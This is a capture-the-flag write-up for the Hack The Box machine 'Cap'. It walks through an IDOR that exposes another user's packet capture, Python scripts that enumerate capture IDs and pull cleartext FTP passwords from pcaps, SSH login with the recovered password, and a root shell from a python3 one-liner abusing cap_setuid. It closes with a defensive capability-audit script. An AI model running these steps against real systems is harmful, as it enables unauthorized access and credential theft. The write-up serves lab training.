
HTB – Cap Writeup

 neoh  main  ~/HTB/cap  sudo nmap 10.10.10.245 -sSCV -p- -T4 -oN nmap.md
[sudo] password for neoh: 
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-14 16:03 EST
Nmap scan report for 10.10.10.245
Host is up (0.026s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn
| fingerprint-strings: 
[...]
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.57 seconds

Nmap shows FTP, SSH and HTTP. I couldn't log in to FTP successfully, so I went to the website.

The website is some sort of security dashboard, and it lets us download a PCAP file.

That pcap had nothing really interesting. Back on the website, the capture lived at http://10.10.10.245/data/1, so I wondered what was at /data/0. It turned out to be an older report, which I downloaded. Nothing ties the numeric ID to the requesting user, so simply decrementing it served a capture that was not ours: a classic insecure direct object reference (IDOR).
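To confirm the IDOR systematically instead of by hand, here is an added probe script (mine, not code from the original writeup) that walks the /data/<id> space and lists every capture the server hands back. It assumes only the URL layout seen above; the function names are my own.

```python
"""Walk sequential /data/<id> capture IDs to confirm the IDOR.

Added example, not code from the original writeup. It assumes captures are
served at http://<host>/data/<n> as seen on the box; the function names are
my own, and only a 200 is treated as "this capture is readable".
"""
from urllib.error import HTTPError, URLError
from urllib.request import urlopen


def fetch_status(url, timeout=5):
    """Return the HTTP status code for url, or None if the host is unreachable."""
    try:
        with urlopen(url, timeout=timeout) as resp:
            return resp.status
    except HTTPError as exc:        # a 4xx/5xx still tells us whether the id exists
        return exc.code
    except URLError:
        return None


def probe_capture_ids(base_url, ids, status_of=fetch_status):
    """Return the ids whose /data/<id> page answers 200.

    We never created most of these captures, so every hit is a report that
    belongs to someone else's session: the app trusts the id alone.
    """
    base = base_url.rstrip("/")
    return [cid for cid in ids if status_of(f"{base}/data/{cid}") == 200]


if __name__ == "__main__":
    # Try the first twenty ids on the box from the nmap scan.
    print(probe_capture_ids("http://10.10.10.245", range(0, 20)))
```

The fix on the application side is to look the capture up by (session owner, id) rather than by id alone, so a guessed number returns 404 for anyone but its owner.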

The older capture contained a login in plain text, lol: FTP sends USER and PASS unencrypted on port 21, and the password for nathan in that capture also works for SSH.
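Reading the login out of the capture is worth automating. The parser below is an added example (mine, not the writeup's): it walks classic pcap records through Ethernet, IPv4 and TCP and pairs each USER with the PASS that follows it on the FTP control channel. The sample capture is constructed in code; its addresses and the login alice/s3cret are placeholders, not the box's credentials.

```python
"""Pull cleartext FTP USER/PASS commands out of a pcap file.

Added example, not part of the original writeup. It reads the classic
little-endian pcap format with Ethernet frames and walks Ethernet -> IPv4
-> TCP to reach the FTP control channel (port 21). build_sample_pcap()
constructs a capture in code for demonstration; its addresses and the
login "alice"/"s3cret" are placeholders, not the box's.
"""
import struct

PCAP_MAGIC_LE = 0xA1B2C3D4   # magic as read from a little-endian pcap
ETH_TYPE_IPV4 = 0x0800
IP_PROTO_TCP = 6
FTP_PORT = 21


def tcp_payloads(data):
    """Yield (src_ip, dst_ip, dst_port, payload) for each IPv4/TCP record."""
    if struct.unpack_from("<I", data, 0)[0] != PCAP_MAGIC_LE:
        raise ValueError("not a little-endian classic pcap (pcapng needs another parser)")
    off = 24                                   # skip the 24-byte global header
    while off + 16 <= len(data):
        _ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack_from("<IIII", data, off)
        off += 16
        frame = data[off:off + incl_len]
        off += incl_len
        if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != ETH_TYPE_IPV4:
            continue
        ip = frame[14:]
        if ip[9] != IP_PROTO_TCP:
            continue
        ihl = (ip[0] & 0x0F) * 4                # IPv4 header length incl. options
        tcp = ip[ihl:]
        dst_port = struct.unpack_from("!H", tcp, 2)[0]
        data_off = (tcp[12] >> 4) * 4           # TCP header length incl. options
        src = ".".join(map(str, ip[12:16]))
        dst = ".".join(map(str, ip[16:20]))
        yield src, dst, dst_port, tcp[data_off:]


def extract_ftp_logins(data):
    """Return [(src, dst, user, password)] for every USER/PASS pair sent to port 21."""
    pending = {}        # (src, dst) -> username waiting for its PASS
    logins = []
    for src, dst, dst_port, payload in tcp_payloads(data):
        if dst_port != FTP_PORT or not payload:
            continue
        line = payload.decode("ascii", "replace").strip()
        cmd, _, arg = line.partition(" ")
        if cmd.upper() == "USER":
            pending[(src, dst)] = arg
        elif cmd.upper() == "PASS" and (src, dst) in pending:
            logins.append((src, dst, pending.pop((src, dst)), arg))
    return logins


def _record(src, dst, sport, dport, payload):
    """One pcap record: Ethernet + minimal IPv4 + minimal TCP + payload."""
    eth = b"\x00" * 12 + struct.pack("!H", ETH_TYPE_IPV4)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64,
                     IP_PROTO_TCP, 0, bytes(map(int, src.split("."))),
                     bytes(map(int, dst.split("."))))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 0x50, 0x18, 8192, 0, 0)
    frame = eth + ip + tcp + payload
    return struct.pack("<IIII", 0, 0, len(frame), len(frame)) + frame


def build_sample_pcap():
    """Constructed capture of one FTP login from 10.0.0.5 to 10.0.0.1."""
    header = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, 1)  # linktype 1 = Ethernet
    c, s = "10.0.0.5", "10.0.0.1"
    return header + b"".join([
        _record(s, c, FTP_PORT, 40000, b"220 (vsFTPd 3.0.3)\r\n"),
        _record(c, s, 40000, FTP_PORT, b"USER alice\r\n"),
        _record(s, c, FTP_PORT, 40000, b"331 Please specify the password.\r\n"),
        _record(c, s, 40000, FTP_PORT, b"PASS s3cret\r\n"),
        _record(s, c, FTP_PORT, 40000, b"230 Login successful.\r\n"),
    ])


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pcap()
    for src, dst, user, pw in extract_ftp_logins(blob):
        print(f"{src} -> {dst}: USER {user} PASS {pw}")
```

Run it as `python3 ftpcreds.py capture.pcap`. It only understands classic little-endian pcap with Ethernet framing; for pcapng or other link types use tshark instead: `tshark -r capture.pcap -Y 'ftp.request.command == "USER" || ftp.request.command == "PASS"' -T fields -e ip.src -e ftp.request.command -e ftp.request.arg`. The point either way is that FTP carries the password in the clear, so anyone who can read the capture (here, anyone who can guess a URL) has it.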
 neoh  main  ~/HTB/validation  ssh nathan@10.10.10.245
The authenticity of host '10.10.10.245 (10.10.10.245)' can't be established.
ECDSA key fingerprint is SHA256:8TaASv/TRhdOSeq3woLxOcKrIOtDhrZJVrrE0WbzjSc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.245' (ECDSA) to the list of known hosts.
nathan@10.10.10.245's password: 
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Nov 14 21:13:58 UTC 2021

  System load:  0.19              Processes:             255
  Usage of /:   36.6% of 8.73GB   Users logged in:       0
  Memory usage: 20%               IPv4 address for eth0: 10.10.10.245
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu May 27 11:21:27 2021 from 10.10.14.7
nathan@cap:~$ sudo -l
[sudo] password for nathan: 
Sorry, user nathan may not run sudo on cap.

After a couple of minutes of enumeration, I found something nice: file capabilities.

nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

/usr/bin/python3.8 carries cap_setuid in its file capabilities with the effective, inheritable and permitted flags set (+eip), so any process that executes it is allowed to change its UID without being root. This is a capability, not a SUID bit, so `find / -perm -4000` would never have shown it; getcap is the check that finds it. Calling os.setuid(0) from the interpreter and spawning a shell is enough:

nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# whoami
root
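The getcap listing above is also exactly what an audit should catch before an attacker does. The script below is an added example (mine, not from the writeup): it parses getcap output in both formats libcap has used, flags binaries whose permitted set grants a capability that hands out root, and prints a setcap command that drops only those. The sample input is the listing from this box; the assumption that python3.8 keeps cap_net_bind_service so the web app can bind port 80 is mine, not something the writeup states.

```python
"""Flag file capabilities that let an unprivileged user escalate.

Added example, not from the original writeup. It parses getcap output in
both formats libcap has used ("/path = caps+flags" as on this box's Ubuntu
20.04, "/path caps=flags" on newer libcap) and reports binaries whose
permitted set includes a capability that hands out root. SAMPLE_GETCAP is
the getcap listing from this box.
"""
import re
import sys

# Capabilities that give a caller root-equivalent power on their own
# (see capabilities(7)); deliberately a short list, not an exhaustive one.
ESCALATION_CAPS = {
    "cap_setuid", "cap_setgid", "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_chown",
    "cap_fowner", "cap_setfcap",
}

CLAUSE = re.compile(r"([\w,]+)[+=]([eip]*)")   # "cap_a,cap_b+eip" or "cap_a,cap_b=eip"

SAMPLE_GETCAP = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""


def parse_getcap_line(line):
    """Return (path, {cap_name: set_of_flags}) for one getcap line, else None."""
    line = line.strip()
    if not line:
        return None
    if " = " in line:                       # old libcap: "/path = cap_a,cap_b+eip"
        path, text = line.split(" = ", 1)
    else:                                   # new libcap: "/path cap_a,cap_b=eip"
        path, _, text = line.partition(" ")
    caps = {}
    for clause in text.split():
        m = CLAUSE.fullmatch(clause)
        if not m:
            continue
        names, flags = m.groups()
        for name in names.split(","):
            caps.setdefault(name, set()).update(flags)
    return path, caps


def remediation_command(path, caps):
    """Build the setcap command that drops only the escalation capabilities.

    Harmless ones are kept: python3.8 here presumably needs
    cap_net_bind_service so the web app can bind port 80 (an assumption).
    """
    keep = sorted(c for c in caps if c not in ESCALATION_CAPS)
    if not keep:
        return f"setcap -r {path}"
    return f"setcap {','.join(keep)}+ep {path}"


def dangerous_binaries(getcap_output):
    """Return [(path, [escalation caps], fix command)] for binaries worth fixing.

    A cap in the permitted set (p) is enough to matter; with the effective
    bit (e) the program gets it at exec time, as python3.8 does here.
    """
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        bad = sorted(c for c, flags in caps.items()
                     if c in ESCALATION_CAPS and "p" in flags)
        if bad:
            findings.append((path, bad, remediation_command(path, caps)))
    return findings


if __name__ == "__main__":
    # Pipe real output in: getcap -r / 2>/dev/null | python3 capaudit.py
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_GETCAP
    for path, bad, fix in dangerous_binaries(text):
        print(f"{path}: {', '.join(bad)} -> {fix}")
```

On this box the only finding is python3.8 with cap_setuid, and the fix it prints keeps the port-binding capability while removing the one that gave us root. An interpreter or any other binary that runs user-supplied code should never carry cap_setuid, cap_dac_override or cap_sys_admin, since those are root by another name.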
